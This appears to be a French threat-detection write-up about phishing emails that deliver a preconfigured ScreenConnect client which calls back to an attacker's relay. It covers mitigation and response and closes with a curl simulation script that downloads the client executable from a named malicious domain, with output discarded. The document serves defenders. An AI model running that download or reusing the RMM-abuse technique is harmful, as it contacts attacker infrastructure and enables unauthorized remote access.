SOC Prime Bias: Medium

05 Oct 2026 17:02 UTC

Utilisation abusive du client ScreenConnect pour permettre un accès à distance non autorisé

Author Photo
SOC Prime Team linkedin icon Suivre
Utilisation abusive du client ScreenConnect pour permettre un accès à distance non autorisé
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les attaquants utilisent des emails de phishing pour distribuer un client ScreenConnect légitime, préconfiguré. L’outil de surveillance et de gestion à distance (RMM) établit une connexion de rappel à une instance contrôlée par l’attaquant, offrant un accès à distance aux systèmes compromis. La campagne abuse de la nature fiable des logiciels légitimes pour échapper aux contrôles de sécurité de base et aux mécanismes de détection.

Enquête

L’enquêteur a examiné un email de phishing contenant un lien qui a livré un fichier PE. L’analyse a confirmé que le fichier était un client ScreenConnect légitime, signé numériquement. Cependant, sa configuration intégrée avait été modifiée pour se connecter à une instance de relais spécifique et à un ID d’instance contrôlés par l’acteur de la menace.

Atténuation

Les navigateurs peuvent bloquer les téléchargements de fichiers exécutables en tant que première couche de protection. Les organisations doivent surveiller l’utilisation non autorisée des outils RMM et appliquer des contrôles stricts sur les exécutables téléchargés à partir de liens web non fiables. La liste blanche d’applications peut également aider à empêcher l’exécution de clients ScreenConnect non autorisés et d’autres logiciels RMM non approuvés.

Réponse

Lorsque des activités malveillantes sont détectées, isolez le point de terminaison affecté pour empêcher l’accès à distance continu par l’attaquant. Identifiez et terminez tous les processus ScreenConnect actifs. Effectuez un examen judiciaire de la configuration du client pour identifier l’infrastructure de commande et de contrôle de l’attaquant et déterminer l’étendue de l’accès non autorisé au système compromis.

Flux d’attaque

Nous mettons encore à jour cette partie.

Détections

Logiciel de gestion / d’accès à distance alternatif (via création_de_processus)

Équipe SOC Prime
05 oct. 2026

Activité de commande et de contrôle possible par tentative de communication de domaine de logiciel d’accès à distance (via DNS)

Équipe SOC Prime
05 oct. 2026

Distribution de logiciels malveillants client ScreenConnect via email de phishing [Proxy HTTP]

Règles AI de SOC Prime
05 oct. 2026

Exécution de simulation

  • Narration de l’attaque & Commandes : L’adversaire vise à établir une persistance sur une station de travail cible en distribuant ScreenConnect via une campagne de phishing. Dans cette simulation, nous reproduisons la phase finale : la machine de la victime effectuant une requête HTTP sortante vers un domaine compromis/malveillant pour télécharger l’exécutable de configuration. Pour imiter le comportement spécifique identifié dans le renseignement sur les menaces, l' »attaquant » utilise une chaîne User-Agent personnalisée ScreenConnect pour demander le chemin de fichier spécifique thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. Cela déclenchera la règle de détection basée sur le proxy.

  • Script de test de régression :

    # Ce script utilise curl pour imiter la requête de téléchargement malveillante identifiée dans la règle de détection.
    # Il utilise l'URL spécifique et l'User-Agent spécifique requis pour déclencher l'alerte.
    
    TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe"
    MALICIOUS_UA="ScreenConnect"
    
    echo "[*] Simulation de tentative de téléchargement de ScreenConnect..."
    echo "[*] URL : $TARGET_URL"
    echo "[*] User-Agent : $MALICIOUS_UA"
    
    # Nous utilisons -k pour ignorer les erreurs SSL si le domaine simulé utilise un certificat auto-signé, 
    # et -A pour définir l'User-Agent spécifique.
    curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null
    
    echo "[*] Commande de simulation envoyée."
  • Commandes de nettoyage :

    # Aucun fichier n'a été réellement téléchargé sur l'hôte lors de la simulation (redirigé vers /dev/null).
    # Aucun changement système n'a été effectué.
    echo "[*] Nettoyage terminé. Aucune trace laissée sur l'hôte."